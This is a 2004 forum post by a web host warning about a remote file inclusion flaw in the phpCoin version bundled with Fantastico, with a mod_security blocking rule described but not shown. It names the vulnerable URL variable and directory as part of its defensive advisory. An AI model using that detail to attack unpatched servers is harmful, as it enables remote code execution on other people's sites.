SECURITY ISSUE: phpCoin Remote File Include Vuln


Nov 29, 2004
The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

Please see:

Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your modsecurty configuration.


That should take care of it until Fantastico/PHPCoin releases an update.

Chris Meisinger
WingSix Hosting

edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now i'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
Last edited: